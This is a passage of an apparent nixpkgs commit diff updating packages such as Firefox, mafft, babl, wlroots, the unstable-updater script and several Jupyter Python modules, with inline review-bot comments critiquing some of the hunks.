-rw-r--r--pkgs/applications/misc/remnote/default.nix4
-rw-r--r--pkgs/applications/networking/browsers/firefox/common.nix15
-rw-r--r--pkgs/applications/science/biology/mafft/default.nix58
-rw-r--r--pkgs/by-name/la/labelle/package.nix6
-rw-r--r--pkgs/by-name/tu/tuifimanager/package.nix7
-rw-r--r--pkgs/by-name/wl/wlogout/package.nix4
-rw-r--r--pkgs/common-updater/unstable-updater.nix224
-rw-r--r--pkgs/development/libraries/babl/default.nix29
-rw-r--r--pkgs/development/libraries/babl/dev-prefix.patch29
-rw-r--r--pkgs/development/libraries/wlroots/default.nix4
-rw-r--r--pkgs/development/python-modules/anywidget/default.nix4
-rw-r--r--pkgs/development/python-modules/ipycanvas/default.nix19
-rw-r--r--pkgs/development/python-modules/ipyniivue/default.nix8
-rw-r--r--pkgs/development/python-modules/jupyterlab-server/default.nix4
-rw-r--r--pkgs/development/python-modules/jupyterlab/default.nix4
-rw-r--r--pkgs/development/python-modules/nbdev/default.nix34
-rw-r--r--pkgs/development/python-modules/nvidia-ml-py/default.nix4
-rw-r--r--pkgs/development/python-modules/papermill/default.nix20
-rw-r--r--pkgs/development/python-modules/plotnine/default.nix4
-rw-r--r--pkgs/tools/package-management/nix/default.nix9
-rw-r--r--pkgs/tools/package-management/nix/patches/2_3/CVE-2024-27297.patch375
-rw-r--r--pkgs/tools/security/rustscan/default.nix35
22 files changed, 334 insertions, 566 deletions
diff --git a/pkgs/applications/misc/remnote/default.nix b/pkgs/applications/misc/remnote/default.nix
index d9028d8876db1..198922f1876c8 100644
--- a/pkgs/applications/misc/remnote/default.nix
+++ b/pkgs/applications/misc/remnote/default.nix
@@ -6,11 +6,11 @@ stdenv.mkDerivation (finalAttrs: let
 in
 {
   pname = "remnote";
-  version = "1.15.4";
+  version = "1.16.4";
 
   src = fetchurl {
     url = "https://download.remnote.io/remnote-desktop/RemNote-${version}.AppImage";
-    hash = "sha256-6WBdTOj/seinx1wJGb/4if3PzCPmtzHyNAFmQwmsrvE=";
+    hash = "sha256-dgbQ0cbPq7BSQ9VwwH6+GoAxb85HDxRixfjeDJBtOrg=";
   };
 
   appexec = appimageTools.wrapType2 {
diff --git a/pkgs/applications/networking/browsers/firefox/common.nix b/pkgs/applications/networking/browsers/firefox/common.nix
index 988cc5481c32b..56dda27e54c92 100644
--- a/pkgs/applications/networking/browsers/firefox/common.nix
+++ b/pkgs/applications/networking/browsers/firefox/common.nix
@@ -298,9 +298,6 @@ buildStdenv.mkDerivation {
   setOutputFlags = false; # `./mach configure` doesn't understand `--*dir=` flags.
 
   preConfigure = ''
-    # remove distributed configuration files
-    rm -f configure js/src/configure .mozconfig*
-
     # Runs autoconf through ./mach configure in configurePhase
     configureScript="$(realpath ./mach) configure"
 
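Review bot: Dropping `rm -f configure js/src/configure .mozconfig*` means any `configure` script or `.mozconfig*` file shipped in the source tarball now survives into `./mach configure`, which honours a `.mozconfig` found in the tree, so the build configuration is no longer guaranteed to come only from this expression. If the line was removed because current tarballs no longer ship those files, a comment stating that, e.g. `# Upstream tarballs no longer ship pre-generated configure/.mozconfig files, so no cleanup is needed`, would stop the next reader from re-adding it blindly. The `preConfigure` string starts in this hunk but continues past it.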
@@ -308,8 +305,8 @@ buildStdenv.mkDerivation {
     export MOZ_BUILD_DATE=$(head -n1 sourcestamp.txt)
 
     # Set predictable directories for build and state
-    export MOZ_OBJDIR=$(pwd)/mozobj
-    export MOZBUILD_STATE_PATH=$(pwd)/mozbuild
+    export MOZ_OBJDIR=$(pwd)/objdir
+    export MOZBUILD_STATE_PATH=$TMPDIR/mozbuild
 
     # Don't try to send libnotify notifications during build
     export MOZ_NOSPAM=1
@@ -353,7 +350,7 @@ buildStdenv.mkDerivation {
       # since the profiling build has not been installed to $out
       ''
         OLD_LDFLAGS="$LDFLAGS"
-        LDFLAGS="-Wl,-rpath,$(pwd)/mozobj/dist/${binaryName}"
+        LDFLAGS="-Wl,-rpath,$(pwd)/objdir/dist/${binaryName}"
       ''}
     fi
   '' + lib.optionalString googleAPISupport ''
@@ -510,7 +507,7 @@ buildStdenv.mkDerivation {
   '';
 
   preBuild = ''
-    cd mozobj
+    cd objdir
   '';
 
   postBuild = ''
@@ -535,9 +532,9 @@ buildStdenv.mkDerivation {
   preInstall = lib.optionalString crashreporterSupport ''
     ./mach buildsymbols
     mkdir -p $symbols/
-    cp mozobj/dist/*.crashreporter-symbols.zip $symbols/
+    cp objdir/dist/*.crashreporter-symbols.zip $symbols/
   '' + ''
-    cd mozobj
+    cd objdir
   '';
 
   postInstall = ''
diff --git a/pkgs/applications/science/biology/mafft/default.nix b/pkgs/applications/science/biology/mafft/default.nix
index f2e3ead2e913c..ca1f89388a442 100644
--- a/pkgs/applications/science/biology/mafft/default.nix
+++ b/pkgs/applications/science/biology/mafft/default.nix
@@ -1,14 +1,20 @@
-{ lib, stdenv, fetchFromGitLab }:
+{
+  lib,
+  stdenv,
+  fetchFromGitLab,
+  runCommand,
+  mafft,
+}:
 
-stdenv.mkDerivation rec {
+stdenv.mkDerivation (finalAttrs: {
   pname = "mafft";
-  version = "7.525";
+  version = "7.526";
 
   src = fetchFromGitLab {
     owner = "sysimm";
-    repo = pname;
-    rev = "v${version}";
-    sha256 = "sha256-ckBmvFssYAmYcBHAEftjQqBV0MB0theGfemaPx3XUws=";
+    repo = "mafft";
+    rev = "v${finalAttrs.version}";
+    hash = "sha256-VNe00r12qEkLEbpZdJCe5xZ73JA3uAmuAeG+eSeRDI0=";
   };
 
   preBuild = ''
@@ -16,14 +22,34 @@ stdenv.mkDerivation rec {
     make clean
   '';
 
-  makeFlags = [ "CC=${stdenv.cc.targetPrefix}cc" "PREFIX=$(out)" ];
+  makeFlags = [
+    "CC=${stdenv.cc.targetPrefix}cc"
+    "PREFIX=$(out)"
+  ];
 
-  meta = with lib;
-    {
-      description = "Multiple alignment program for amino acid or nucleotide sequences";
-      homepage = "https://mafft.cbrc.jp/alignment/software/";
-      license = licenses.bsd3;
-      maintainers = with maintainers; [ natsukium ];
-      platforms = platforms.unix;
-    };
-}
+  passthru.tests = {
+    simple = runCommand "${finalAttrs.pname}-test" { } ''
+      mkdir $out
+      cd ${finalAttrs.src}/test
+      ${lib.getExe mafft} sample > $out/test.fftns2
+      ${lib.getExe mafft} --maxiterate 100  sample > $out/test.fftnsi
+      ${lib.getExe mafft} --globalpair sample > $out/test.gins1
+      ${lib.getExe mafft} --globalpair --maxiterate 100  sample > $out/test.ginsi
+      ${lib.getExe mafft} --localpair sample > $out/test.lins1
+      ${lib.getExe mafft} --localpair --maxiterate 100  sample > $out/test.linsi
+      diff $out/test.fftns2 sample.fftns2
+      diff $out/test.fftnsi sample.fftnsi
+      diff $out/test.gins1 sample.gins1
+      diff $out/test.ginsi sample.ginsi
+      diff $out/test.lins1 sample.lins1
+    '';
+  };
+
+  meta = with lib; {
+    description = "Multiple alignment program for amino acid or nucleotide sequences";
+    homepage = "https://mafft.cbrc.jp/alignment/software/";
+    license = licenses.bsd3;
+    maintainers = with maintainers; [ natsukium ];
+    platforms = platforms.unix;
+  };
+})
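Review bot: The new `passthru.tests.simple` produces `$out/test.linsi` (the `--localpair --maxiterate 100` run) but never compares it: the `diff` list stops at `test.lins1`, so that invocation can regress without failing the test. If the upstream test directory ships a `sample.linsi` reference like the other five, add `diff $out/test.linsi sample.linsi` after the `test.lins1` line; if it does not, drop the unverified run so the test does not spend time on output nobody checks. A short comment above the block naming what the reference files are (`# compare against the reference alignments shipped in test/`) would also help, since the test depends on `finalAttrs.src` containing them.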
diff --git a/pkgs/by-name/la/labelle/package.nix b/pkgs/by-name/la/labelle/package.nix
index 39d4a1f76a6ba..4affc6ef54e1a 100644
--- a/pkgs/by-name/la/labelle/package.nix
+++ b/pkgs/by-name/la/labelle/package.nix
@@ -8,14 +8,14 @@
 }:
 python3Packages.buildPythonApplication rec {
   pname = "labelle";
-  version = "1.1.0";
+  version = "1.2.0";
   pyproject = true;
 
   src = fetchFromGitHub {
     owner = "labelle-org";
     repo = "labelle";
     rev = "v${version}";
-    hash = "sha256-JnV5A3/toTCHCEb0dygouR9MZfk2kdmsKVscwYI2y/Y=";
+    hash = "sha256-fLlYqJs/V5t8IdfVkfBsjtjM1rRdCyTYF87G+h1VU5Y=";
   };
 
   postPatch = ''
@@ -39,6 +39,8 @@ python3Packages.buildPythonApplication rec {
     pyqt6
     python-barcode
     pyusb
+    rich
+    typer
   ];
 
   desktopItems = [
diff --git a/pkgs/by-name/tu/tuifimanager/package.nix b/pkgs/by-name/tu/tuifimanager/package.nix
index eee63fb90c9d5..3e0531f4805f5 100644
--- a/pkgs/by-name/tu/tuifimanager/package.nix
+++ b/pkgs/by-name/tu/tuifimanager/package.nix
@@ -5,14 +5,14 @@
 
 python3.pkgs.buildPythonApplication rec {
   pname = "tuifimanager";
-  version = "4.0.0";
+  version = "4.0.5";
   format = "pyproject";
 
   src = fetchFromGitHub {
     owner = "GiorgosXou";
     repo = "TUIFIManager";
-    rev = "v${version}";
-    hash = "sha256-bv/+x2xppUK9i3HOm93FIQRu1xlB4wCKZzAapkVlrM0=";
+    rev = "refs/tags/v${version}";
+    hash = "sha256-DuCrIJuADmJ0MHIP0+OJ0zCrQR/oGdgzJ1xck4m/tPo=";
   };
 
   nativeBuildInputs = [
@@ -34,7 +34,6 @@ python3.pkgs.buildPythonApplication rec {
       attempt to get more attention to the Uni-Curses project.
     '';
     homepage = "https://github.com/GiorgosXou/TUIFIManager";
-    changelog = "https://github.com/GiorgosXou/TUIFIManager/blob/${src.rev}/CHANGELOG.md";
     license = licenses.gpl3Only;
     maintainers = with maintainers; [ michaelBelsanti sigmanificient ];
     mainProgram = "tuifi";
diff --git a/pkgs/by-name/wl/wlogout/package.nix b/pkgs/by-name/wl/wlogout/package.nix
index 0107dbad89ba8..4f328cb9f53cf 100644
--- a/pkgs/by-name/wl/wlogout/package.nix
+++ b/pkgs/by-name/wl/wlogout/package.nix
@@ -20,13 +20,13 @@
 
 stdenv.mkDerivation (finalAttrs: {
   pname = "wlogout";
-  version = "1.2.1";
+  version = "1.2.2";
 
   src = fetchFromGitHub {
     owner = "ArtsyMacaw";
     repo = "wlogout";
     rev = finalAttrs.version;
-    hash = "sha256-n8r+E6GXXjyDYBTOMiv5musamaUFSpRTM2qHgb047og=";
+    hash = "sha256-/tYZy56ku68ziSOhy6Dex9RGy+blkU6CN2ze76y7718=";
   };
 
   outputs = [ "out" "man" ];
diff --git a/pkgs/common-updater/unstable-updater.nix b/pkgs/common-updater/unstable-updater.nix
index 29b7fcf196795..d982fc6110ba7 100644
--- a/pkgs/common-updater/unstable-updater.nix
+++ b/pkgs/common-updater/unstable-updater.nix
@@ -1,5 +1,5 @@
 { lib
-, writeShellScript
+, writeShellApplication
 , coreutils
 , git
 , nix
@@ -10,114 +10,162 @@
 # commit.
 { url ? null # The git url, if empty it will be set to src.gitRepoUrl
 , branch ? null
-, stableVersion ? false # Use version format according to RFC 107 (i.e. LAST_TAG+date=YYYY-MM-DD)
-, tagPrefix ? "" # strip this prefix from a tag name when using stable version
+, hardcodeZeroVersion ? false # Use a made-up version "0" instead of latest tag. Use when there is no previous release, or the project's tagging system is incompatible with what we expect from versions
+, tagFormat ? "*" # A `git describe --tags --match '<format>'` pattern that tags must match to be considered
+, tagPrefix ? null # strip this prefix from a tag name
+, tagConverter ? null # A command to convert more complex tag formats. It receives the git tag via stdin and should convert it into x.y.z format to stdout
 , shallowClone ? true
 }:
 
+assert lib.asserts.assertMsg (tagPrefix == null || tagConverter == null) "Can only use either tagPrefix or tagConverter!";
+
 let
-  updateScript = writeShellScript "unstable-update-script.sh" ''
-    set -ex
+  updateScript = writeShellApplication {
+    name = "unstable-update-script";
+    runtimeInputs = [
+      common-updater-scripts
+      coreutils
+      git
+      nix
+    ];
+    text = ''
+      set -ex
+
+      url=""
+      branch=""
+      hardcode_zero_version=""
+      tag_format=""
+      tag_prefix=""
+      tag_converter=""
+      shallow_clone=""
+      : "''${systemArg:=}"
 
-    url=""
-    branch=""
-    use_stable_version=""
-    tag_prefix=""
-    shallow_clone=""
+      while (( $# > 0 )); do
+          flag="$1"
+          shift 1
+          case "$flag" in
+            --url=*)
+              url="''${flag#*=}"
+              ;;
+            --branch=*)
+              branch="''${flag#*=}"
+              ;;
+            --hardcode-zero-version)
+              hardcode_zero_version=1
+              ;;
+            --tag-format=*)
+              tag_format="''${flag#*=}"
+              ;;
+            --tag-prefix=*)
+              tag_prefix="''${flag#*=}"
+              ;;
+            --tag-converter=*)
+              tag_converter="''${flag#*=}"
+              ;;
+            --shallow-clone)
+              shallow_clone=1
+              ;;
+            *)
+              echo "$0: unknown option ‘''${flag}’"
+              exit 1
+              ;;
+          esac
+      done
 
-    while (( $# > 0 )); do
-        flag="$1"
-        shift 1
-        case "$flag" in
-          --url=*)
-            url="''${flag#*=}"
-            ;;
-          --branch=*)
-            branch="''${flag#*=}"
-            ;;
-          --use-stable-version)
-            use_stable_version=1
-            ;;
-          --tag-prefix=*)
-            tag_prefix="''${flag#*=}"
-            ;;
-          --shallow-clone)
-            shallow_clone=1
-            ;;
-          *)
-            echo "$0: unknown option ‘''${flag}’"
-            exit 1
-            ;;
-        esac
-    done
+      # By default we set url to src.gitRepoUrl
+      if [[ -z "$url" ]]; then
+          # system argument cannot be passed as 1 argument
+          # shellcheck disable=SC2086
+          url="$(nix-instantiate $systemArg --eval -E \
+                     "with import ./. {}; $UPDATE_NIX_ATTR_PATH.src.gitRepoUrl" \
+              | tr -d '"')"
+      fi
 
-    # By default we set url to src.gitRepoUrl
-    if [[ -z "$url" ]]; then
-        url="$(${nix}/bin/nix-instantiate $systemArg --eval -E \
-                   "with import ./. {}; $UPDATE_NIX_ATTR_PATH.src.gitRepoUrl" \
-            | tr -d '"')"
-    fi
+      # Get info about HEAD from a shallow git clone
+      tmpdir="$(mktemp -d)"
 
-    # Get info about HEAD from a shallow git clone
-    tmpdir="$(${coreutils}/bin/mktemp -d)"
+      cloneArgs=()
 
-    cloneArgs=(
-      --bare
-    )
+      if [[ "$shallow_clone" == "1" ]]; then
+          cloneArgs+=(--depth=1)
+      fi
 
-    if [[ "$shallow_clone" == "1" ]]; then
-        cloneArgs+=(--depth=1)
-    fi
+      if [[ -n "$branch" ]]; then
+          cloneArgs+=(--branch="$branch")
+      fi
 
-    if [[ -n "$branch" ]]; then
-        cloneArgs+=(--branch="$branch")
-    fi
+      git clone "''${cloneArgs[@]}" "$url" "$tmpdir"
+      getLatestVersion() {
+          git describe --tags --abbrev=0 --match "''${tag_format}" 2> /dev/null || true
+      }
 
-    ${git}/bin/git clone "''${cloneArgs[@]}" "$url" "$tmpdir"
+      pushd "$tmpdir"
+      commit_date="$(git show -s --pretty='format:%cs')"
+      commit_sha="$(git show -s --pretty='format:%H')"
+      last_tag=""
+      if [[ -z "$hardcode_zero_version" ]]; then
+          if [[ "$shallow_clone" == "1" ]]; then
+              depth=100
+              while (( depth < 10000 )); do
+                  last_tag="$(getLatestVersion)"
+                  if [[ -n "$last_tag" ]]; then
+                      break
+                  fi
+                  git fetch --depth="$depth" --tags
+                  depth=$(( depth * 2 ))
+              done
 
-    pushd "$tmpdir"
-    commit_date="$(${git}/bin/git show -s --pretty='format:%cs')"
-    commit_sha="$(${git}/bin/git show -s --pretty='format:%H')"
-    if [[ -z "$use_stable_version" ]]; then
-        new_version="unstable-$commit_date"
-    else
-        depth=100
-        while (( $depth < 10000 )); do
-            last_tag="$(${git}/bin/git describe --tags --abbrev=0 2> /dev/null || true)"
-            if [[ -n "$last_tag" ]]; then
-                break
-            fi
-            ${git}/bin/git fetch --depth="$depth" --tags
-            depth=$(( $depth * 2 ))
-        done
-        if [[ -z "$last_tag" ]]; then
-            echo "Cound not found a tag within last 10000 commits" > /dev/stderr
-            exit 1
-        fi
-        if [[ -n "$tag_prefix" ]]; then
-          last_tag="''${last_tag#$tag_prefix}"
-        fi
-        new_version="$last_tag+date=$commit_date"
-    fi
-    popd
-    # ${coreutils}/bin/rm -rf "$tmpdir"
+              if [[ -z "$last_tag" ]]; then
+                  # To be extra sure, check if full history helps with finding a tag
+                  git fetch --tags
+                  last_tag="$(getLatestVersion)"
+              fi
+          else
+              last_tag="$(getLatestVersion)"
+          fi
+          if [[ -z "$last_tag" ]]; then
+              last_tag="0"
+          fi
+          if [[ -n "$tag_prefix" ]]; then
+              echo "Stripping prefix '$tag_prefix' from tag '$last_tag'"
+              last_tag="''${last_tag#"''${tag_prefix}"}"
+          fi
+          if [[ -n "$tag_converter" ]]; then
+              echo "Running '$last_tag' through: $tag_converter"
+              last_tag="$(echo "''${last_tag}" | ''${tag_converter})"
+          fi
+      else
+          last_tag="0"
+      fi
+      if [[ ! "$last_tag" =~ ^[[:digit:]] ]]; then
+          echo "Last tag '$last_tag' does not start with a digit" > /dev/stderr
+          exit 1
+      fi
+      new_version="$last_tag-unstable-$commit_date"
+      popd
+      # rm -rf "$tmpdir"
 
-    # update the nix expression
-    ${common-updater-scripts}/bin/update-source-version \
-        "$UPDATE_NIX_ATTR_PATH" \
-        "$new_version" \
-        --rev="$commit_sha"
-  '';
+      # update the nix expression
+      update-source-version \
+          "$UPDATE_NIX_ATTR_PATH" \
+          "$new_version" \
+          --rev="$commit_sha"
+    '';
+  };
 
 in
 [
-  updateScript
+  (lib.getExe updateScript)
   "--url=${builtins.toString url}"
+  "--tag-format=${tagFormat}"
 ] ++ lib.optionals (branch != null) [
   "--branch=${branch}"
-] ++ lib.optionals stableVersion [
-  "--use-stable-version"
+] ++ lib.optionals (tagPrefix != null) [
   "--tag-prefix=${tagPrefix}"
+] ++ lib.optionals (tagConverter != null) [
+  "--tag-converter=${tagConverter}"
+] ++ lib.optionals hardcodeZeroVersion [
+  "--hardcode-zero-version"
 ] ++ lib.optionals shallowClone [
   "--shallow-clone"
 ]
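Review bot: When no tag is found, the new script silently sets `last_tag="0"` (the `if [[ -z "$last_tag" ]]` branch after the fetch loop) where the old script aborted with an error, so a mistyped `--tag-format` pattern or a clone that simply has no matching tags now yields a version like `0-unstable-2024-05-01` with no diagnostic. Print a warning before the fallback, e.g. `echo "No tag matching '$tag_format' found, falling back to version 0" >&2`, so the updater's output shows why the version lost its tag component; `hardcodeZeroVersion` remains the explicit opt-in. Separately, `$url` is taken from evaluating `src.gitRepoUrl` and passed straight to `git clone`; writing it as `git clone "''${cloneArgs[@]}" -- "$url" "$tmpdir"` keeps a value starting with `-` from being parsed as an option. Note that `''${tag_converter}` is deliberately unquoted so it word-splits into a command plus arguments; a comment to that effect on the pipeline line would make the contract clear to anyone tempted to quote it.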
diff --git a/pkgs/development/libraries/babl/default.nix b/pkgs/development/libraries/babl/default.nix
index b3ec8194c92a9..e74947dd8194a 100644
--- a/pkgs/development/libraries/babl/default.nix
+++ b/pkgs/development/libraries/babl/default.nix
@@ -1,30 +1,36 @@
 { stdenv
 , lib
-, fetchpatch
 , fetchurl
 , meson
 , ninja
 , pkg-config
+, gi-docgen
 , gobject-introspection
 , lcms2
 , vala
 }:
 
-stdenv.mkDerivation rec {
+stdenv.mkDerivation (finalAttrs: {
   pname = "babl";
-  version = "0.1.106";
+  version = "0.1.108";
 
-  outputs = [ "out" "dev" ];
+  outputs = [ "out" "dev" "devdoc" ];
 
   src = fetchurl {
-    url = "https://download.gimp.org/pub/babl/${lib.versions.majorMinor version}/babl-${version}.tar.xz";
-    hash = "sha256-0yUTXTME8IjBNMxiABOs8DXeLl0SWlCi2RBU5zd8QV8=";
+    url = "https://download.gimp.org/pub/babl/${lib.versions.majorMinor finalAttrs.version}/babl-${finalAttrs.version}.tar.xz";
+    hash = "sha256-Jt7+neqresTQ4HbKtJwqDW69DfDDH9IJklpfB+3uFHU=";
   };
 
+  patches = [
+    # Allow overriding path to dev output that will be hardcoded e.g. in pkg-config file.
+    ./dev-prefix.patch
+  ];
+
   nativeBuildInputs = [
     meson
     ninja
     pkg-config
+    gi-docgen
     gobject-introspection
     vala
   ];
@@ -33,6 +39,15 @@ stdenv.mkDerivation rec {
     lcms2
   ];
 
+  mesonFlags = [
+    "-Dprefix-dev=${placeholder "dev"}"
+  ];
+
+  postFixup = ''
+    # Cannot be in postInstall, otherwise _multioutDocs hook in preFixup will move right back.
+    moveToOutput "share/doc" "$devdoc"
+  '';
+
   meta = with lib; {
     description = "Image pixel format conversion library";
     mainProgram = "babl";
@@ -42,4 +57,4 @@ stdenv.mkDerivation rec {
     maintainers = with maintainers; [ jtojnar ];
     platforms = platforms.unix;
   };
-}
+})
diff --git a/pkgs/development/libraries/babl/dev-prefix.patch b/pkgs/development/libraries/babl/dev-prefix.patch
new file mode 100644
index 0000000000000..9dab6c6a9ad47
--- /dev/null
+++ b/pkgs/development/libraries/babl/dev-prefix.patch
@@ -0,0 +1,29 @@
+diff --git a/meson.build b/meson.build
+index 2350a1f..56f015d 100644
+--- a/meson.build
++++ b/meson.build
+@@ -551,7 +551,7 @@ pkgconfig.generate(
+   variables: [
+     'datadir=${prefix}/share',
+     'pluginsdir=${libdir}/@0@'.format(lib_name),
+-    'girdir=${datadir}/gir-1.0',
++    'girdir=@0@/share/gir-1.0'.format(get_option('prefix-dev')),
+     'typelibdir=${libdir}/girepository-1.0',
+   ],
+   uninstalled_variables: [
+diff --git a/meson_options.txt b/meson_options.txt
+index f9d558c..3cac593 100644
+--- a/meson_options.txt
++++ b/meson_options.txt
+@@ -9,6 +9,11 @@ option('enable-gir',
+   choices: ['auto', 'true', 'false'],
+   description: 'gobject introspection .gir generation'
+ )
++option('prefix-dev',
++  type: 'string',
++  value: '',
++  description: 'Like prefix but for dev output of the package'
++)
+ option('enable-vapi',
+   type: 'boolean',
+   value: 'true', 
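Review bot: With the new `prefix-dev` option defaulting to `''`, the rewritten `girdir` line expands to `/share/gir-1.0` whenever the option is not passed, so the patch only works because the nixpkgs expression always sets `-Dprefix-dev`; outside that context it replaces a correct default with a broken one. Keeping the upstream value as the fallback makes the patch safe to propose upstream: `'girdir=' + (get_option('prefix-dev') != '' ? '@0@/share/gir-1.0'.format(get_option('prefix-dev')) : '${datadir}/gir-1.0'),`. A one-line header comment at the top of the patch file stating its purpose (which the `patches` entry in default.nix already gives) would also let the file stand on its own.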
diff --git a/pkgs/development/libraries/wlroots/default.nix b/pkgs/development/libraries/wlroots/default.nix
index 4dd884b45859a..e130da1664be7 100644
--- a/pkgs/development/libraries/wlroots/default.nix
+++ b/pkgs/development/libraries/wlroots/default.nix
@@ -125,8 +125,8 @@ rec {
   };
 
   wlroots_0_17 = generic {
-    version = "0.17.2";
-    hash = "sha256-Of9qykyVnBURc5A2pvCMm7sLbnuuG7OPWLxodQLN2Xg=";
+    version = "0.17.3";
+    hash = "sha256-jth6BKci3sVDC86o+gSHKyDWnibVcNmipm7nn0S6LTg=";
     extraBuildInputs = [
       ffmpeg
       hwdata
diff --git a/pkgs/development/python-modules/anywidget/default.nix b/pkgs/development/python-modules/anywidget/default.nix
index 07c6bb744923c..767fc775851d1 100644
--- a/pkgs/development/python-modules/anywidget/default.nix
+++ b/pkgs/development/python-modules/anywidget/default.nix
@@ -14,14 +14,14 @@
 
 buildPythonPackage rec {
   pname = "anywidget";
-  version = "0.9.9";
+  version = "0.9.10";
   pyproject = true;
 
   disabled = pythonOlder "3.7";
 
   src = fetchPypi {
     inherit pname version;
-    hash = "sha256-vs5tYcVabzlkCeu1p20mDo9LIh+cUeUWFQc3o18WUu8=";
+    hash = "sha256-OQpigkCYHAmBPHUjJ53cq4L/T9Moet1UM7eLE2kIkGg=";
   };
 
   # We do not need the jupyterlab build dependency, because we do not need to
diff --git a/pkgs/development/python-modules/ipycanvas/default.nix b/pkgs/development/python-modules/ipycanvas/default.nix
index 85961b450ec17..2222c0bdad0d3 100644
--- a/pkgs/development/python-modules/ipycanvas/default.nix
+++ b/pkgs/development/python-modules/ipycanvas/default.nix
@@ -2,7 +2,7 @@
 , buildPythonPackage
 , fetchPypi
 , pythonOlder
-, jupyter-packaging
+, hatchling
 , ipywidgets
 , numpy
 , pillow
@@ -10,14 +10,14 @@
 
 buildPythonPackage rec {
   pname = "ipycanvas";
-  version = "0.13.1";
-  format = "pyproject";
+  version = "0.13.2";
+  pyproject = true;
 
   disabled = pythonOlder "3.7";
 
   src = fetchPypi {
     inherit pname version;
-    hash = "sha256-+cOUBoG8ODgzkPjEbqXYRF1uEcbaZITDfYnfWuHawTE=";
+    hash = "sha256-Ujh9nYf2WVXzlVL7eSfEReXl5JN9hTgU2RDL6O+g+3k=";
   };
 
   # We relax dependencies here instead of pulling in a patch because upstream
@@ -26,13 +26,16 @@ buildPythonPackage rec {
   #
   postPatch = ''
     substituteInPlace pyproject.toml \
-      --replace '"jupyterlab==3.*",' "" \
-      --replace 'jupyter_packaging~=' 'jupyter_packaging>='
+      --replace-fail '"jupyterlab>=3,<5",' "" \
   '';
 
-  nativeBuildInputs = [ jupyter-packaging ];
+  build-system = [
+    hatchling
+  ];
 
-  propagatedBuildInputs = [ ipywidgets numpy pillow ];
+  env.HATCH_BUILD_NO_HOOKS = true;
+
+  dependencies = [ ipywidgets numpy pillow ];
 
   doCheck = false;  # tests are in Typescript and require `npx` and `chromium`
   pythonImportsCheck = [ "ipycanvas" ];
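Review bot: The `--replace-fail` line in `postPatch` ends with a trailing `\` followed by nothing but the closing `''`, leaving a dangling line continuation now that the second `--replace` was removed; it is harmless to bash but reads as an unfinished edit, so drop the backslash. The new `env.HATCH_BUILD_NO_HOOKS = true;` has no explanation, whereas the comment above the `postPatch` explains the dependency relaxation in detail; a one-line comment saying which hook is being skipped and why the package still builds without it would keep the next updater from removing the setting. The preceding comment that introduces `postPatch` starts before this hunk.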
diff --git a/pkgs/development/python-modules/ipyniivue/default.nix b/pkgs/development/python-modules/ipyniivue/default.nix
index c097f2cb404e8..14667b0942ed4 100644
--- a/pkgs/development/python-modules/ipyniivue/default.nix
+++ b/pkgs/development/python-modules/ipyniivue/default.nix
@@ -3,21 +3,21 @@
 , fetchPypi
 , pythonOlder
 , hatchling
-, hatch-jupyter-builder
+, hatch-vcs
 , anywidget
 , pytestCheckHook
 }:
 
 buildPythonPackage rec {
   pname = "ipyniivue";
-  version = "2.0.0";
+  version = "2.0.1";
   pyproject = true;
 
   disabled = pythonOlder "3.7";
 
   src = fetchPypi {
     inherit pname version;
-    hash = "sha256-CvMSUvPyXxPexs0/0sa/xt65RFWtvmYZwGSMIQGvLkc=";
+    hash = "sha256-C0mYkguN4ZfxSLqETH3dUwXeoNcicrmAgp6e9IIT43s=";
   };
 
   # We do not need the build hooks, because we do not need to
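Review bot: The context comment on the last line of this hunk, `# We do not need the build hooks, because we do not need to …`, introduces logic (presumably a `postPatch`) written for `hatch-jupyter-builder`, which this hunk removes from the inputs in favour of `hatch-vcs`. If the 2.0.1 sdist no longer declares that hook, the patching step it describes is dead code and should go together with its comment; if it still does, the comment should be updated to say that the hook is stripped rather than depended on. Either way the explanation continues outside the hunk, so it is worth checking the rest of the file before merging.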
@@ -26,7 +26,7 @@ buildPythonPackage rec {
 
   build-system = [
     hatchling
-    hatch-jupyter-builder
+    hatch-vcs
   ];
 
   dependencies = [ anywidget ];
diff --git a/pkgs/development/python-modules/jupyterlab-server/default.nix b/pkgs/development/python-modules/jupyterlab-server/default.nix
index f295ce204ad29..059cb1c5ac52a 100644
--- a/pkgs/development/python-modules/jupyterlab-server/default.nix
+++ b/pkgs/development/python-modules/jupyterlab-server/default.nix
@@ -21,7 +21,7 @@
 
 buildPythonPackage rec {
   pname = "jupyterlab-server";
-  version = "2.26.0";
+  version = "2.27.1";
   pyproject = true;
 
   disabled = pythonOlder "3.8";
@@ -29,7 +29,7 @@ buildPythonPackage rec {
   src = fetchPypi {
     pname = "jupyterlab_server";
     inherit version;
-    hash = "sha256-mzupHPKDf38ST8o21j88qArOK+1ImKY91H5lmMGrAG8=";
+    hash = "sha256-CXtaxwm2dscoSsnF43PxGTClYfUs1ahuT8flqcioYx0=";
   };
 
   postPatch = ''
diff --git a/pkgs/development/python-modules/jupyterlab/default.nix b/pkgs/development/python-modules/jupyterlab/default.nix
index dc48c597d5489..7b9a17d91e2ca 100644
--- a/pkgs/development/python-modules/jupyterlab/default.nix
+++ b/pkgs/development/python-modules/jupyterlab/default.nix
@@ -20,14 +20,14 @@
 
 buildPythonPackage rec {
   pname = "jupyterlab";
-  version = "4.1.6";
+  version = "4.1.8";
   pyproject = true;
 
   disabled = pythonOlder "3.8";
 
   src = fetchPypi {
     inherit pname version;
-    hash = "sha256-eTXza6JuthUYOk9cK7yleRtRCM4qALVQX4z9EA1TZI4=";
+    hash = "sha256-M4St7YaA585QT9Y7i7iaOd8hycdpTZ59xKaHQs2zD5s=";
   };
 
   nativeBuildInputs = [
diff --git a/pkgs/development/python-modules/nbdev/default.nix b/pkgs/development/python-modules/nbdev/default.nix
index 8a298ec19f67f..ee82753ae822e 100644
--- a/pkgs/development/python-modules/nbdev/default.nix
+++ b/pkgs/development/python-modules/nbdev/default.nix
@@ -1,40 +1,50 @@
 { lib
 , buildPythonPackage
 , fetchPypi
-, fastprogress
+, pythonRelaxDepsHook
+, setuptools
+, ipywidgets
 , fastcore
-, asttokens
 , astunparse
 , watchdog
 , execnb
 , ghapi
 , pyyaml
-, quarto
 , pythonOlder
 }:
 
 buildPythonPackage rec {
   pname = "nbdev";
-  version = "2.3.13";
-  format = "setuptools";
+  version = "2.3.14";
+  pyproject = true;
 
   disabled = pythonOlder "3.7";
 
   src = fetchPypi {
     inherit pname version;
-    hash = "sha256-Umkf3CcRRSS+pK3UKeTg+Ru3TW+qHNoQ2F6nUk8jQUU=";
+    hash = "sha256-9Tacr4mWmjXspKKCkFDWYeT7KkBh4/3f6UOkfj0/leg=";
   };
 
-  propagatedBuildInputs = [
